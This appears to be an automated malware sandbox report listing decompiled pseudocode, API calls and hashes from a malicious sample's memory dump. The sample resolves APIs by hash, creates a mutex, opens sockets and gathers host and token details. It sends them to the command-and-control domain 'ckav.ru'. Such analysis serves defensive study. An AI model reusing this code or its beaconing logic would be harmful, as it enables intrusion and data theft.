                        • Opcode ID: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                        • Instruction ID: cd86427636297e763c0a42ccb852711c5927781faf2e94d4e6bb5dc6023ef8f2
                        • Opcode Fuzzy Hash: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                        • Instruction Fuzzy Hash: 93C04C711842087BFE116ED1DC06F483E199B45B59F104011B71C2C0D1D9F3A6516559
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00404ED4, Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON
                        Download Yara Rule
                        APIs
                        • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                        Memory Dump Source
                        • Source File: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.611933317.00000000004A0000.00000040.00000001.sdmp Download File
                        Yara matches
                        Similarity
                        • API ID: recv
                        • String ID:
                        • API String ID: 1507349165-0
                        • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                        • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                        • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                        • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004061C3, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 151COMMON
                        Download Yara Rule
                        C-Code - Quality: 75%
                        			E004061C3(void* __eax, void* __ebx, void* __eflags) {
				int _v8;
				long _v12;
				int _v16;
				int _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr* _t25;
				int _t27;
				int _t30;
				int _t31;
				int _t36;
				int _t37;
				intOrPtr* _t39;
				int _t40;
				long _t44;
				intOrPtr* _t45;
				int _t46;
				void* _t48;
				int _t49;
				void* _t67;
				void* _t68;
				void* _t74;

				_t48 = __ebx;
				_t67 = 0;
				_v8 = 0;
				E00402BF2();
				_t68 = __eax;
				_t25 = E004031E5(__ebx, 9, 0xe87a9e93, 0, 0);
				_t2 =  &_v8; // 0x414449
				_push(1);
				_push(8);
				_push(_t68);
				if( *_t25() != 0) {
					L4:
					_t27 = E00402B7C(0x208);
					_v20 = _t27;
					__eflags = _t27;
					if(_t27 != 0) {
						E0040338C(_t27, _t67, 0x104);
						_t74 = _t74 + 0xc;
					}
					_push(_t48);
					_t49 = E00402B7C(0x208);
					__eflags = _t49;
					if(_t49 != 0) {
						E0040338C(_t49, _t67, 0x104);
						_t74 = _t74 + 0xc;
					}
					_v28 = 0x208;
					_v24 = 0x208;
					_t7 =  &_v8; // 0x414449
					_v12 = _t67;
					E004031E5(_t49, 9, 0xecae3497, _t67, _t67);
					_t30 = GetTokenInformation( *_t7, 1, _t67, _t67,  &_v12); // executed
					__eflags = _t30;
					if(_t30 == 0) {
						_t36 = E00402B7C(_v12);
						_v16 = _t36;
						__eflags = _t36;
						if(_t36 != 0) {
							_t14 =  &_v8; // 0x414449, executed
							_t37 = E00406086( *_t14, 1, _t36, _v12,  &_v12); // executed
							__eflags = _t37;
							if(_t37 != 0) {
								_t39 = E004031E5(_t49, 9, 0xc0862e2b, _t67, _t67);
								_t40 =  *_t39(_t67,  *_v16, _v20,  &_v28, _t49,  &_v24,  &_v32); // executed
								__eflags = _t40;
								if(__eflags != 0) {
									_t67 = E00405B6F(__eflags, L"%s", _t49);
								}
							}
							E00402BAB(_v16);
						}
					}
					__eflags = _v8;
					if(_v8 != 0) {
						E00403C40(_v8); // executed
					}
					__eflags = _t49;
					if(_t49 != 0) {
						E00402BAB(_t49);
					}
					_t31 = _v20;
					__eflags = _t31;
					if(_t31 != 0) {
						E00402BAB(_t31);
					}
					return _t67;
				}
				_t44 = GetLastError();
				if(_t44 == 0x3f0) {
					E004060AC();
					_t45 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
					_t3 =  &_v8; // 0x414449
					_t46 =  *_t45(_t44, 8, _t3);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L2;
					}
					goto L4;
				}
				L2:
				return 0;
			}


























                        0x004061c3
                        0x004061cb
                        0x004061cd
                        0x004061d0
                        0x004061de
                        0x004061e0
                        0x004061e5
                        0x004061e9
                        0x004061eb
                        0x004061ed
                        0x004061f2
                        0x0040622a
                        0x00406230
                        0x00406235
                        0x00406239
                        0x0040623b
                        0x00406244
                        0x00406249
                        0x00406249
                        0x0040624c
                        0x00406253
                        0x00406256
                        0x00406258
                        0x00406261
                        0x00406266
                        0x00406266
                        0x00406270
                        0x00406273
                        0x00406276
                        0x0040627b
                        0x0040627e
                        0x0040628c
                        0x0040628e
                        0x00406290
                        0x00406295
                        0x0040629a
                        0x0040629e
                        0x004062a0
                        0x004062ac
                        0x004062af
                        0x004062b7
                        0x004062b9
                        0x004062c9
                        0x004062e0
                        0x004062e2
                        0x004062e4
                        0x004062f3
                        0x004062f3
                        0x004062e4
                        0x004062f8
                        0x004062fd
                        0x004062a0
                        0x004062fe
                        0x00406302
                        0x00406307
                        0x0040630c
                        0x0040630d
                        0x0040630f
                        0x00406312
                        0x00406317
                        0x00406318
                        0x0040631c
                        0x0040631e
                        0x00406321
                        0x00406326
                        0x00000000
                        0x00406327
                        0x004061f4
                        0x004061ff
                        0x00406208
                        0x00406218
                        0x0040621d
                        0x00406224
                        0x00406226
                        0x00406228
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00406228
                        0x00406201
                        0x00000000

                        APIs
                        • GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
                        • _wmemset.LIBCMT ref: 00406244
                        • _wmemset.LIBCMT ref: 00406261
                        • GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.611933317.00000000004A0000.00000040.00000001.sdmp Download File
                        Yara matches
                        Similarity
                        • API ID: _wmemset$ErrorInformationLastToken
                        • String ID: IDA$IDA
                        • API String ID: 487585393-2020647798
                        • Opcode ID: 361f5901e0b8fd221317340a43d44222897358287ed0cab1ee46ebfb6b6b92c4
                        • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                        • Opcode Fuzzy Hash: 361f5901e0b8fd221317340a43d44222897358287ed0cab1ee46ebfb6b6b92c4
                        • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00404E17, Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON
                        Download Yara Rule
                        C-Code - Quality: 37%
                        			E00404E17(intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void _v40;
				void* _t23;
				signed int _t24;
				signed int* _t25;
				signed int _t30;
				signed int _t31;
				signed int _t33;
				signed int _t41;
				void* _t42;
				signed int* _t43;

				_v8 = _v8 & 0x00000000;
				_t33 = 8;
				memset( &_v40, 0, _t33 << 2);
				_v32 = 1;
				_t23 =  &_v40;
				_v28 = 6;
				_v36 = 2;
				__imp__getaddrinfo(_a4, _a8, _t23,  &_v8); // executed
				if(_t23 == 0) {
					_t24 = E00402B7C(4);
					_t43 = _t24;
					_t31 = _t30 | 0xffffffff;
					 *_t43 = _t31;
					_t41 = _v8;
					__imp__#23( *((intOrPtr*)(_t41 + 4)),  *((intOrPtr*)(_t41 + 8)),  *((intOrPtr*)(_t41 + 0xc)), _t42, _t30); // executed
					 *_t43 = _t24;
					if(_t24 != _t31) {
						__imp__#4(_t24,  *((intOrPtr*)(_t41 + 0x18)),  *((intOrPtr*)(_t41 + 0x10))); // executed
						if(_t24 == _t31) {
							E00404DE5(_t24,  *_t43);
							 *_t43 = _t31;
						}
						__imp__freeaddrinfo(_v8);
						if( *_t43 != _t31) {
							_t25 = _t43;
							goto L10;
						} else {
							E00402BAB(_t43);
							L8:
							_t25 = 0;
							L10:
							return _t25;
						}
					}
					E00402BAB(_t43);
					__imp__freeaddrinfo(_v8);
					goto L8;
				}
				return 0;
			}

















                        0x00404e1d
                        0x00404e26
                        0x00404e2a
                        0x00404e2f
                        0x00404e37
                        0x00404e3a
                        0x00404e45
                        0x00404e4f
                        0x00404e57
                        0x00404e61
                        0x00404e66
                        0x00404e68
                        0x00404e6c
                        0x00404e6e
                        0x00404e7a
                        0x00404e80
                        0x00404e84
                        0x00404e9f
                        0x00404ea7
                        0x00404eab
                        0x00404eb1
                        0x00404eb1
                        0x00404eb6
                        0x00404ebe
                        0x00404ecb
                        0x00000000
                        0x00404ec0
                        0x00404ec1
                        0x00404ec7
                        0x00404ec7
                        0x00404ecd
                        0x00000000
                        0x00404ece
                        0x00404ebe
                        0x00404e87
                        0x00404e90
                        0x00000000
                        0x00404e90
                        0x00000000

                        APIs
                        • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                        • socket.WS2_32(?,?,?), ref: 00404E7A
                        • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                        Memory Dump Source
                        • Source File: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.611933317.00000000004A0000.00000040.00000001.sdmp Download File
                        Yara matches
                        Similarity
                        • API ID: freeaddrinfogetaddrinfosocket
                        • String ID:
                        • API String ID: 2479546573-0
                        • Opcode ID: e22eb4597c528fad89aa2306bbf5fab64752e69decfa66c962aefb5bd8f8ada5
                        • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                        • Opcode Fuzzy Hash: e22eb4597c528fad89aa2306bbf5fab64752e69decfa66c962aefb5bd8f8ada5
                        • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004040BB, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129filememoryCOMMON
                        Download Yara Rule
                        C-Code - Quality: 74%
                        			E004040BB(void* __eflags, WCHAR* _a4, long* _a8, intOrPtr _a12) {
				struct _SECURITY_ATTRIBUTES* _v8;
				char _v12;
				long _v16;
				void* __ebx;
				void* __edi;
				void* _t16;
				intOrPtr* _t25;
				long* _t28;
				void* _t30;
				int _t32;
				intOrPtr* _t33;
				void* _t35;
				void* _t42;
				intOrPtr _t43;
				long _t44;
				struct _OVERLAPPED* _t46;

				_t46 = 0;
				_t35 = 0;
				E004031E5(0, 0, 0xe9fabb88, 0, 0);
				_t16 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_t42 = _t16;
				_v8 = _t42;
				if(_t42 == 0xffffffff) {
					__eflags = _a12;
					if(_a12 == 0) {
						L10:
						return _t35;
					}
					_t43 = E00403C90(_t42, L".tmp", 0, 0, 0x1a);
					__eflags = _t43;
					if(_t43 == 0) {
						goto L10;
					}
					_push(0);
					__eflags = E00403C59(_a4, _t43);
					if(__eflags != 0) {
						_v8 = 0;
						_t46 = E004040BB(__eflags, _t43,  &_v8, 0);
						_push(_t43);
						 *_a8 = _v8;
						E00403D44();
					}
					E00402BAB(_t43);
					return _t46;
				}
				_t25 = E004031E5(0, 0, 0xf9435d1e, 0, 0);
				_t44 =  *_t25(_t42,  &_v12);
				if(_v12 != 0 || _t44 > 0x40000000) {
					L8:
					_t45 = _v8;
					goto L9;
				} else {
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 = _t44;
					}
					E004031E5(_t35, _t46, 0xd4ead4e2, _t46, _t46);
					_t30 = VirtualAlloc(_t46, _t44, 0x1000, 4); // executed
					_t35 = _t30;
					if(_t35 == 0) {
						goto L8;
					} else {
						E004031E5(_t35, _t46, 0xcd0c9940, _t46, _t46);
						_t45 = _v8;
						_t32 = ReadFile(_v8, _t35, _t44,  &_v16, _t46); // executed
						if(_t32 == 0) {
							_t33 = E004031E5(_t35, _t46, 0xf53ecacb, _t46, _t46);
							 *_t33(_t35, _t46, 0x8000);
							_t35 = _t46;
						}
						L9:
						E00403C40(_t45); // executed
						goto L10;
					}
				}
			}



















                        0x004040c4
                        0x004040ce
                        0x004040d0
                        0x004040e8
                        0x004040ea
                        0x004040ec
                        0x004040f2
                        0x0040418d
                        0x00404190
                        0x00404184
                        0x00000000
                        0x00404184
                        0x004041a0
                        0x004041a5
                        0x004041a7
                        0x00000000
                        0x00000000
                        0x004041a9
                        0x004041b6
                        0x004041b8
                        0x004041be
                        0x004041cb
                        0x004041d0
                        0x004041d1
                        0x004041d3
                        0x004041d8
                        0x004041dc
                        0x00000000
                        0x004041e2
                        0x00404100
                        0x0040410c
                        0x00404111
                        0x0040417a
                        0x0040417a
                        0x00000000
                        0x0040411b
                        0x0040411b
                        0x00404120
                        0x00404122
                        0x00404122
                        0x0040412c
                        0x0040413a
                        0x0040413c
                        0x00404140
                        0x00000000
                        0x00404142
                        0x0040414a
                        0x00404155
                        0x0040415a
                        0x0040415e
                        0x00404168
                        0x00404174
                        0x00404176
                        0x00404176
                        0x0040417d
                        0x0040417e
                        0x00000000
                        0x00404183
                        0x00404140

                        APIs
                        • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
                        • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
                        • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.611933317.00000000004A0000.00000040.00000001.sdmp Download File
                        Yara matches
                        Similarity
                        • API ID: File$AllocCreateReadVirtual
                        • String ID: .tmp
                        • API String ID: 3585551309-2986845003
                        • Opcode ID: 3c21b548154e04a740e383bdfa5f0ec46f521fe53328019d1d2661260406abab
                        • Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
                        • Opcode Fuzzy Hash: 3c21b548154e04a740e383bdfa5f0ec46f521fe53328019d1d2661260406abab
                        • Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00413866, Relevance: 4.6, APIs: 3, Instructions: 147synchronizationCOMMON
                        Download Yara Rule
                        C-Code - Quality: 79%
                        			E00413866(void* __eflags) {
				short _v6;
				short _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				short _v20;
				short _v22;
				char _v24;
				short _v28;
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				short _v38;
				short _v40;
				short _v42;
				short _v44;
				short _v46;
				char _v48;
				short _v52;
				short _v54;
				short _v56;
				short _v58;
				short _v60;
				short _v62;
				short _v64;
				short _v66;
				short _v68;
				short _v70;
				short _v72;
				short _v74;
				char _v76;
				void* __ebx;
				void* __edi;
				void* _t38;
				short _t43;
				short _t44;
				short _t45;
				short _t46;
				short _t47;
				short _t48;
				short _t50;
				short _t51;
				short _t52;
				short _t54;
				short _t55;
				intOrPtr* _t57;
				intOrPtr* _t59;
				intOrPtr* _t61;
				void* _t63;
				WCHAR* _t65;
				long _t68;
				void* _t75;
				short _t76;
				short _t78;
				short _t83;
				short _t84;
				short _t85;

				E00402C6C(_t38);
				E004031E5(_t75, 0, 0xd1e96fcd, 0, 0);
				SetErrorMode(3); // executed
				_t43 = 0x4f;
				_v76 = _t43;
				_t44 = 0x4c;
				_v74 = _t44;
				_t45 = 0x45;
				_v72 = _t45;
				_t46 = 0x41;
				_v70 = _t46;
				_t47 = 0x55;
				_v68 = _t47;
				_t48 = 0x54;
				_t76 = 0x33;
				_t84 = 0x32;
				_t83 = 0x2e;
				_t78 = 0x64;
				_t85 = 0x6c;
				_v66 = _t48;
				_v52 = 0;
				_t50 = 0x77;
				_v48 = _t50;
				_t51 = 0x73;
				_v46 = _t51;
				_t52 = 0x5f;
				_v42 = _t52;
				_v28 = 0;
				_t54 = 0x6f;
				_v24 = _t54;
				_t55 = 0x65;
				_v20 = _t55;
				_v64 = _t76;
				_v62 = _t84;
				_v60 = _t83;
				_v58 = _t78;
				_v56 = _t85;
				_v54 = _t85;
				_v44 = _t84;
				_v40 = _t76;
				_v38 = _t84;
				_v36 = _t83;
				_v34 = _t78;
				_v32 = _t85;
				_v30 = _t85;
				_v22 = _t85;
				_v18 = _t76;
				_v16 = _t84;
				_v14 = _t83;
				_v12 = _t78;
				_v10 = _t85;
				_v8 = _t85;
				_v6 = 0;
				_t57 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				 *_t57( &_v76);
				_t59 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				 *_t59( &_v48);
				_t61 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				_t81 =  &_v24;
				 *_t61( &_v24); // executed
				_t63 = E00414059(); // executed
				if(_t63 != 0) {
					_t65 = E00413D97(0);
					E004031E5(0, 0, 0xcf167df4, 0, 0);
					CreateMutexW(0, 1, _t65); // executed
					_t68 = GetLastError();
					_t92 = _t68 - 0xb7;
					if(_t68 == 0xb7) {
						E00413B81(0);
						_pop(_t81); // executed
					}
					E00413003(_t92); // executed
					E00412B2E(_t92); // executed
					E00412D31(_t81, _t84); // executed
					E00413B3F();
					E00413B81(0);
					 *0x49fdd0 = 1;
				}
				return 0;
			}































































                        0x0041386f
                        0x0041387e
                        0x00413885
                        0x00413889
                        0x0041388c
                        0x00413890
                        0x00413893
                        0x00413897
                        0x0041389a
                        0x0041389e
                        0x004138a1
                        0x004138a5
                        0x004138a8
                        0x004138ac
                        0x004138af
                        0x004138b2
                        0x004138b5
                        0x004138b8
                        0x004138bb
                        0x004138bc
                        0x004138c4
                        0x004138c8
                        0x004138cb
                        0x004138cf
                        0x004138d2
                        0x004138d6
                        0x004138d7
                        0x004138df
                        0x004138e3
                        0x004138e4
                        0x004138ea
                        0x004138eb
                        0x004138f1
                        0x004138f5
                        0x004138f9
                        0x004138fd
                        0x00413901
                        0x00413905
                        0x00413909
                        0x0041390d
                        0x00413911
                        0x00413915
                        0x00413919
                        0x0041391d
                        0x00413921
                        0x00413925
                        0x00413929
                        0x0041392d
                        0x00413931
                        0x00413935
                        0x00413939
                        0x0041393d
                        0x00413941
                        0x00413950
                        0x00413959
                        0x0041395f
                        0x00413968
                        0x0041396e
                        0x00413973
                        0x00413977
                        0x00413979
                        0x00413980
                        0x00413982
                        0x00413991
                        0x0041399c
                        0x0041399e
                        0x004139a4
                        0x004139a9
                        0x004139ac
                        0x004139b1
                        0x004139b1
                        0x004139b2
                        0x004139b7
                        0x004139bc
                        0x004139c1
                        0x004139c7
                        0x004139cd
                        0x004139cd
                        0x004139db

                        APIs
                        • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                        • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                        • GetLastError.KERNEL32 ref: 0041399E
                        Memory Dump Source
                        • Source File: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.611933317.00000000004A0000.00000040.00000001.sdmp Download File
                        Yara matches
                        Similarity
                        • API ID: Error$CreateLastModeMutex
                        • String ID:
                        • API String ID: 3448925889-0
                        • Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                        • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                        • Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                        • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004042CF, Relevance: 4.6, APIs: 3, Instructions: 60fileCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E004042CF(void* __ebx, void* __eflags, WCHAR* _a4, void* _a8, long _a12) {
				long _v8;
				void* _t7;
				long _t10;
				void* _t21;
				struct _OVERLAPPED* _t24;

				_t14 = __ebx;
				_t24 = 0;
				_v8 = 0;
				E004031E5(__ebx, 0, 0xe9fabb88, 0, 0);
				_t7 = CreateFileW(_a4, 0xc0000000, 0, 0, 4, 0x80, 0); // executed
				_t21 = _t7;
				if(_t21 != 0xffffffff) {
					E004031E5(__ebx, 0, 0xeebaae5b, 0, 0);
					_t10 = SetFilePointer(_t21, 0, 0, 2); // executed
					if(_t10 != 0xffffffff) {
						E004031E5(_t14, 0, 0xc148f916, 0, 0);
						WriteFile(_t21, _a8, _a12,  &_v8, 0); // executed
						_t24 =  !=  ? 1 : 0;
					}
					E00403C40(_t21); // executed
				}
				return _t24;
			}








                        0x004042cf
                        0x004042d5
                        0x004042df
                        0x004042e2
                        0x004042f9
                        0x004042fb
                        0x00404300
                        0x0040430a
                        0x00404314
                        0x00404319
                        0x00404323
                        0x00404334
                        0x0040433b
                        0x0040433b
                        0x0040433f
                        0x00404344
                        0x0040434c

                        APIs
                        • CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
                        • WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334
                        Memory Dump Source
                        • Source File: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.611933317.00000000004A0000.00000040.00000001.sdmp Download File
                        Yara matches
                        Similarity
                        • API ID: File$CreatePointerWrite
                        • String ID:
                        • API String ID: 3672724799-0
                        • Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                        • Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
                        • Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                        • Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00412D31, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 178threadCOMMON
                        Download Yara Rule
                        C-Code - Quality: 34%
                        			E00412D31(void* __ecx, void* __edi) {
				long _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				char _v40;
				void* __ebx;
				intOrPtr* _t10;
				void* _t11;
				void* _t25;
				void* _t26;
				void* _t27;
				void* _t35;
				void* _t53;
				char* _t57;
				void* _t58;
				void* _t61;
				void* _t64;
				void* _t65;
				intOrPtr* _t66;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t70;
				void* _t71;
				void* _t72;
				void* _t73;

				_t53 = __ecx;
				_t10 =  *0x49fde0;
				_t68 = _t67 - 0x24;
				 *0x49fddc = 0x927c0;
				 *0x49fde4 = 0;
				_t75 = _t10;
				if(_t10 != 0) {
					L16:
					_push(1);
					_t11 = E004141A7(_t80,  *_t10,  *((intOrPtr*)(_t10 + 8))); // executed
					_t61 = _t11;
					_t68 = _t68 + 0xc;
					if(_t61 != 0) {
						E004031E5(0, 0, 0xfcae4162, 0, 0);
						CreateThread(0, 0, E0041289A, _t61, 0,  &_v8); // executed
					}
					L004067C4(0xea60); // executed
					_pop(_t53);
				} else {
					_push(__edi);
					 *0x49fde0 = E004056BF(0x2bc);
					E00413DB7(_t53, _t75,  &_v40);
					_t57 =  &_v24;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					E004058D4( *0x49fde0, 0x12);
					E004058D4( *0x49fde0, 0x28);
					E00405872( *0x49fde0, "ckav.ru", 0, 0);
					_t69 = _t68 + 0x28;
					_t64 = E0040632F();
					_push(0);
					_push(1);
					if(_t64 == 0) {
						_push(0);
						_push( *0x49fde0);
						E00405872();
						_t70 = _t69 + 0x10;
					} else {
						_push(_t64);
						_push( *0x49fde0);
						E00405872();
						E00402BAB(_t64);
						_t70 = _t69 + 0x14;
					}
					_t58 = E00406130(_t57);
					_push(0);
					_push(1);
					_t77 = _t64;
					if(_t64 == 0) {
						_push(0);
						_push( *0x49fde0);
						_t25 = E00405872();
						_t71 = _t70 + 0x10; // executed
					} else {
						_push(_t58);
						_push( *0x49fde0);
						E00405872();
						_t25 = E00402BAB(_t58);
						_t71 = _t70 + 0x14;
					}
					_t26 = E004061C3(_t25, 0, _t77); // executed
					_t65 = _t26;
					_push(0);
					_push(1);
					if(_t65 == 0) {
						_push(0);
						_push( *0x49fde0);
						_t27 = E00405872();
						_t72 = _t71 + 0x10;
					} else {
						_push(_t65);
						_push( *0x49fde0);
						E00405872();
						_t27 = E00402BAB(_t65);
						_t72 = _t71 + 0x14;
					}
					_t66 = E00406189(_t27);
					_t79 = _t66;
					if(_t66 == 0) {
						E00405781( *0x49fde0, 0);
						E00405781( *0x49fde0, 0);
						_t73 = _t72 + 0x10;
					} else {
						E00405781( *0x49fde0,  *_t66);
						E00405781( *0x49fde0,  *((intOrPtr*)(_t66 + 4)));
						E00402BAB(_t66);
						_t73 = _t72 + 0x14;
					}
					E004058D4( *0x49fde0, E004063B2(0, _t53, _t79));
					E004058D4( *0x49fde0, E004060BD(_t79)); // executed
					_t35 = E0040642C(_t79); // executed
					E004058D4( *0x49fde0, _t35);
					E004058D4( *0x49fde0, _v24);
					E004058D4( *0x49fde0, _v20);
					E004058D4( *0x49fde0, _v16);
					E004058D4( *0x49fde0, _v12);
					E00405872( *0x49fde0, E00413D97(0), 1, 0);
					_t68 = _t73 + 0x48;
				}
				_t80 =  *0x49fde4;
				if( *0x49fde4 == 0) {
					_t10 =  *0x49fde0;
					goto L16;
				}
				return E00405695(_t53,  *0x49fde0);
			}






























                        0x00412d31
                        0x00412d34
                        0x00412d39
                        0x00412d3c
                        0x00412d49
                        0x00412d50
                        0x00412d52
                        0x00412f24
                        0x00412f24
                        0x00412f2b
                        0x00412f30
                        0x00412f32
                        0x00412f37
                        0x00412f41
                        0x00412f53
                        0x00412f53
                        0x00412f5b
                        0x00412f60
                        0x00412d58
                        0x00412d58
                        0x00412d63
                        0x00412d6c
                        0x00412d73
                        0x00412d7e
                        0x00412d7f
                        0x00412d80
                        0x00412d81
                        0x00412d82
                        0x00412d8f
                        0x00412da1
                        0x00412da6
                        0x00412dae
                        0x00412db0
                        0x00412db1
                        0x00412db5
                        0x00412dce
                        0x00412dcf
                        0x00412dd5
                        0x00412dda
                        0x00412db7
                        0x00412db7
                        0x00412db8
                        0x00412dbe
                        0x00412dc4
                        0x00412dc9
                        0x00412dc9
                        0x00412de2
                        0x00412de4
                        0x00412de5
                        0x00412de7
                        0x00412de9
                        0x00412e02
                        0x00412e03
                        0x00412e09
                        0x00412e0e
                        0x00412deb
                        0x00412deb
                        0x00412dec
                        0x00412df2
                        0x00412df8
                        0x00412dfd
                        0x00412dfd
                        0x00412e11
                        0x00412e17
                        0x00412e19
                        0x00412e1a
                        0x00412e1e
                        0x00412e37
                        0x00412e38
                        0x00412e3e
                        0x00412e43
                        0x00412e20
                        0x00412e20
                        0x00412e21
                        0x00412e27
                        0x00412e2d
                        0x00412e32
                        0x00412e32
                        0x00412e4b
                        0x00412e4d
                        0x00412e4f
                        0x00412e7e
                        0x00412e8a
                        0x00412e8f
                        0x00412e51
                        0x00412e59
                        0x00412e67
                        0x00412e6d
                        0x00412e72
                        0x00412e72
                        0x00412e9e
                        0x00412eaf
                        0x00412eb4
                        0x00412ec0
                        0x00412ece
                        0x00412edc
                        0x00412eea
                        0x00412ef8
                        0x00412f0f
                        0x00412f14
                        0x00412f14
                        0x00412f17
                        0x00412f1d
                        0x00412f1f
                        0x00000000
                        0x00412f1f
                        0x00412f74

                        APIs
                        • CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53
                          • Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F
                          • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                          • Part of subcall function 00402BAB: RtlFreeHeap.NTDLL(00000000), ref: 00402BC0
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.611933317.00000000004A0000.00000040.00000001.sdmp Download File
                        Yara matches
                        Similarity
                        • API ID: Heap$CreateFreeProcessThread_wmemset
                        • String ID: ckav.ru
                        • API String ID: 2915393847-2696028687
                        • Opcode ID: d166330210f886f258cea0f95f040112802ba461a537879de6ad45a462bfc85e
